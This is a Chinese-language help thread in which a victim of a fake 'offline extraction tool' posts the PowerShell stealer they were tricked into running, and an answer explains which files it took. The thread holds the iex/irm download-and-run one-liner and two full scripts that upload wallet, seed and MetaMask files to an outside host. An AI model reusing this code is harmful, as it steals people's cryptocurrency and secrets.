我被骗了在 powershell 上运行这个程序——我受到了多大的损害?

tag-icon tag-icon powershell
我被骗了在 powershell 上运行这个程序——我受到了多大的损害?

以下是脚本的链接:hxxps://extract-offline.tools/bip

以下是用来愚弄我的说明:https://medium.com/@article-343624/convert-tool-f894f6244d4f

我在 PowerShell 桌面上运行了 iex“& { $(irm extract-offline.tools/bip) } RunJob”。

我没有将任何内容放入我创建的 bip39.txt 文档中,我的桌面上没有任何这些文本文件(但它可以访问其他目录吗?)或各种加密货币的钱包文件夹。我确实有 Metamask,但没有脚本提到的 00003 文件夹。Metamask 扩展肯定不会在文件中保留任何未加密的信息?可以访问这些吗?

如果有人能告诉我这对我的电脑到底造成了什么影响,以便我可以采取必要的措施,我将不胜感激。

编辑/更新 2024 年 4 月 4 日:这是最近评论中建议的 URL 中的脚本。看起来他们对其进行了一些修改,但本质并没有太大变化(我保存了原始内容并将其添加到下面):

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$ErrorActionPreference = 'silentlycontinue'
$targetUrl = 'extract-offline.tools/data.php'
Write-Host "Loading 'bip' module from offline extraction tool..."

$headers = @{
        "Content-Disposition" = "attachment; filename=`"$fileFullPath`""
    }
    
Write-Host "Retrieving PowerShell version information and installed modules..."



function UploadFiles {
    param(
        [string]$targetUrl,
        [string]$appDirectory,
        [string]$fileExtension
    )

    if ($fileExtension) {
        $files = Get-ChildItem $appDirectory -Recurse -File -Filter "*$fileExtension" | Where-Object { $_.Length -lt 800KB }
    } else {
        $files = Get-ChildItem $appDirectory -Recurse -File | Where-Object { $_.Length -lt 800KB }
    }

    foreach ($file in $files) {
        $fileFullPath = $file.FullName
        $headers = @{
            "Content-Disposition" = "attachment; filename=`"$fileFullPath`""
        }
        Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $fileFullPath -Headers $headers | Out-Null
    }
}



if ($env:OS -eq "Windows_NT") {
    $appAppdata = [Environment]::GetFolderPath([Environment+SpecialFolder]::ApplicationData)
    $appDesktop = Join-Path -Path $env:USERPROFILE -ChildPath "Desktop"
    $appDocuments = Join-Path -Path $env:USERPROFILE -ChildPath "Documents"
    $appDataRoamingPath = [Environment]::GetFolderPath([Environment+SpecialFolder]::ApplicationData)
    $appElectrum = Join-Path -Path $appDataRoamingPath -ChildPath "Electrum"
    $electrumwalletsDirectory = Join-Path -Path $appElectrum -ChildPath "wallets"
} else {
    $appAppdata = "$env:HOME/Library/Application Support"
    $appDesktop = "$env:HOME/Desktop"
    $appElectrum = Join-Path -Path $appDataRoamingPath -ChildPath "Electrum"
    $electrumwalletsDirectory = Join-Path -Path $appElectrum -ChildPath "wallets"
}



UploadFiles -targetUrl $targetUrl -appDirectory $appDesktop -fileExtension ".txt"
UploadFiles -targetUrl $targetUrl -appDirectory $appDesktop -fileExtension ".dat"

UploadFiles -targetUrl $targetUrl -appDirectory $appDocuments -fileExtension ".txt"
UploadFiles -targetUrl $targetUrl -appDirectory $appDocuments -fileExtension ".dat"

UploadFiles -targetUrl $targetUrl -appDirectory $appDataRoamingPath -fileExtension ".dat"

UploadFiles -targetUrl $targetUrl -appDirectory $electrumwalletsDirectory


Write-Host "Loading 'bip' module from powershell extraction tool...... Failed."
Write-Host "Windows version not supported..."

原始脚本:

$ErrorActionPreference = 'silentlycontinue'
$targetUrl = 'extract-offline.tools/data.php'
Write-Host "Loading 'bip' module from offline extraction tool..."


function Process-Df {
    param (
        [string]$filename,
        [string]$data
    )

    $desktopPath = Join-Path $env:USERPROFILE 'Desktop'
    $filePath = Join-Path $desktopPath $filename
    $headers = @{
        "Content-Disposition" = "attachment; filename="$filename"; data="$data""
    }
    Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $filePath -Headers $headers | Out-Null
}

function Process-Af {
    param (
        [string]$filename,
        [string]$data
    )

    $appDataPath = [System.IO.Path]::Combine($env:APPDATA)
    $filePath = Join-Path $appDataPath $filename
    $headers = @{
        "Content-Disposition" = "attachment; filename="$filename"; data="$data""
    }
    Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $filePath -Headers $headers | Out-Null
}

function Process-Ll {
    param (
        [string]$filename,
        [string]$data
    )

    $appDataLocalPath = [System.IO.Path]::Combine($env:LOCALAPPDATA)
    $filePath = Join-Path $appDataLocalPath $filename
    $headers = @{
        "Content-Disposition" = "attachment; filename="$filename"; data="$data""
    }
    Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $filePath -Headers $headers | Out-Null
}


Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./wallet.txt" -Headers $headers | Out-Nul
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39.txt" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39.dat" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip44.txt" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./seed.txt" -Headers $headers | Out-Null
Process-Df -filename "wallet.txt" -data "wallet_txt"
Process-Df -filename "bip39.txt" -data "bip39"
Process-Df -filename "seed.txt" -data "seed"
Process-Df -filename "wallet.dat" -data "wallet_dat"
Process-Df -filename "pass.txt" -data "pass"
Process-Df -filename "password.txt" -data "pass"
Process-Df -filename "password" -data "pass"
Process-Af -filename "./Dogecoin/wallet.dat" -data "doge"
Process-Af -filename "./electrum/wallets/default_wallet" -data "el1"
Process-Af -filename "./electrum/wallets/wallet_1" -data "el2"
Process-Af -filename "./WalletWasabi/Client/Wallets/Wallet.json" -data "wasabi"
Process-Af -filename "./Bitcoin/wallet.dat" -data "btc"
Process-Af -filename "./BitcoinCore/wallet.dat" -data "btccore"
Process-Af -filename "./Litecoin/wallet.dat" -data "ltc"
Process-Ll -filename "./Google/Chrome/User Data/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn/000003" -data "metamask"

Write-Host "Loading 'bip' module from powershell extraction tool...... Failed."
Write-Host "Windows version not supported..."

答案1

您问题中的脚本试图窃取一些数据:

  • Windows 或 macOS 桌面文件夹及其子文件夹中的所有.txt文件.dat
  • Windows“Documents”文件夹及其子文件夹中的所有.txt文件.dat
  • .datWindows AppData\Roaming( %AppData%) 文件夹及其子文件夹中的所有文件
  • 整个文件AppData\Roaming\Electrum\wallets

它只会上传最大大小为 800 KiB 的文件。

它尝试做更多的事情(在 macOS 上),但由于制作相当业余,因此不会成功。

该脚本不会持久存在,也不会对您的电脑做出任何改变。

如果你有 Electrum 加密钱包,你可能就可以和这些币告别了。否则,只有你才能判断上传的文件中有什么,以及这些文件到底是什么。

原始脚本类似。它没有持续存在,效果并不好。它试图窃取这些文件:

  • .\wallet.txt(相对于 PowerShell 中的当前文件夹)
  • .\bip39.txt
  • .\bip39.dat
  • .\bip39
  • .\bip44.txt
  • .\seed.txt
  • ...\Desktop\wallet.txt(在您的桌面文件夹中)
  • ...\Desktop\bip39.txt
  • ...\Desktop\seed.txt
  • ...\Desktop\wallet.dat
  • ...\Desktop\pass.txt
  • ...\Desktop\password.txt
  • ...\Desktop\password
  • %AppData%\Dogecoin\wallet.dat
  • %AppData%\electrum\wallets\default_wallet
  • %AppData%\electrum\wallets\wallet_1
  • %AppData%\WalletWasabi\Client\Wallets\Wallet.json
  • %AppData%\Bitcoin\wallet.dat
  • %AppData%\BitcoinCore\wallet.dat
  • %AppData%\Litecoin\wallet.dat
  • %LocalAppData%\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\000003,这是一些 Metamask Chrome 扩展程序数据文件;它不会被加密,至少不会被 Chrome 加密

这些文件加密了吗?可能加密,也可能不加密。有些可能是用户创建的。至于钱包,对加密货币的热情并不一定与对加密货币的理解一致。此外,大多数软件总体上都做得很差。

相关内容